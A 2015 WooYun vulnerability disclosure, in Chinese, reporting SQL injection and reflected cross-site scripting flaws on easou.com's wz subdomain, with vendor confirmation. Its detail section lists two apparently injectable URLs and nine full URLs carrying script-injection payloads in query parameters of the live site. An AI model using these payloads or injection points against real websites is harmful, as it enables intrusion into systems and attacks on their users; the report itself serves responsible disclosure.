当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095159

漏洞标题:宜搜网址漏洞礼包

相关厂商:easou.com

漏洞作者: BMa

提交时间:2015-02-02 15:20

修复时间:2015-03-19 15:22

公开时间:2015-03-19 15:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

宜搜网址漏洞礼包

详细说明:

先来两枚SQL:
1、wz.easou.com/coln.e?esid=U4xDHpoG85s&tk=com_about4&wver=t

0.jpg


2、wz.easou.com/sdp.e?esid=sZiDHOa2iMa&ps=97&wver=t

1.jpg


XSS:
1、

http://wz.easou.com//coln.e?enid=bcgn3508_46171'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&esid=5LuRvt_tZiDjl3Z3E2z_OVQS0&wver=c


1.jpg


2、

http://wz.easou.com//gs.e?esid=U4xDHpoG85s'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&gsid=1631&gsname=%E4%B9%A6%E7%B1%8D&wver=t


2.jpg


3、

http://wz.easou.com/gs.e?esid=U4xDHpoG85s&gsid=1631&gsname=%25E4%25B9%25A6%25E7%25B1%258D'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&wver=t


3.jpg


4、

http://wz.easou.com/gst.e?enid=bcgn3508_46171'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&esid=5LuRvt_tZiDjl3Z3E2z_OVQS0&gsname=%E7%94%9F%E6%B4%BB&id=129&wver=t


4.jpg


5、

http://wz.easou.com/gst.e?esid=U4xDHpoG85s'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&gsname=%E4%B9%A6%E7%B1%8D&id=129&wver=t


5.jpg


6、

http://wz.easou.com/gst.e?esid=U4xDHpoG85s&gsname=%25E4%25B9%25A6%25E7%25B1%258D'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&id=83&wver=t


6.jpg


7、

http://wz.easou.com/index.e?esid=U4xDHpoG85s'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&wver=t


7.jpg


8、

http://wz.easou.com//s.e?gsname=%25ca%25e9%25bc%25ae'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&keyword=1&wver=t


8.jpg


9、

http://wz.easou.com//sdp.e?enid=bcgn3508_46171'%22()%26%25<acx><ScRiPt%20>prompt(/BMa/)</ScRiPt>&esid=5LuRvt_tZiDjl3Z3E2z_OVQS0&ps=97&wver=t


9.jpg


还有一些CRLF,http头等,请自查

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-02 15:23

厂商回复:

谢谢指出。我们会及时改正

最新状态:

暂无